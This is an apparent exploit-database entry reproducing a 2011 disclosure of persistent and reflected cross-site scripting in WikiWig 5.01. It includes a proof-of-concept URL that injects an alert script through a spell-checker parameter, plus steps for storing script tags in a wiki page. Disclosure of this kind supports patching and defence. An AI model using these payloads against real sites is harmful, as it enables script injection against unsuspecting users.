WikiWig 5.01 Persistent/Reflected Cross-site Scripting

vendor:

WikiWig

by:

AutoSec Tools

N/A

CVSS

N/A

Persistent/Reflected Cross-site Scripting

CWE

Product Name: WikiWig

Affected Version From: 05.01

Affected Version To: 05.01

Patch Exists: YES

Related CWE: N/A

CPE: a:wikiwig:wikiwig:5.01

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Vista + XAMPP

2011

WikiWig 5.01 Persistent/Reflected Cross-site Scripting

A persistent/reflected cross-site scripting vulnerability in WikiWig 5.01 can be exploited to execute arbitrary JavaScript. Reflected: http://localhost/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E Persistent: Create a user account. Edit any page and add script tags. <script>alert(0)</script>

Mitigation:

Upgrade to the latest version of WikiWig.

Source

Exploit-DB raw data:

Source: http://packetstormsecurity.org/files/view/99363/wikiwig501-xss.txt

------------------------------------------------------------------------
Software................WikiWig 5.01
Vulnerability...........Persistent/Reflected Cross-site Scripting
Threat Level............Moderate (2/5)
Download................http://wikiwig.sourceforge.net/
Disclosure Date.........3/10/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A persistent/reflected cross-site scripting vulnerability in WikiWig
5.01 can be exploited to execute arbitrary JavaScript.


--PoC--

Reflected:
http://localhost/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E

Persistent:
Create a user account. Edit any page and add script tags.

<script>alert(0)</script>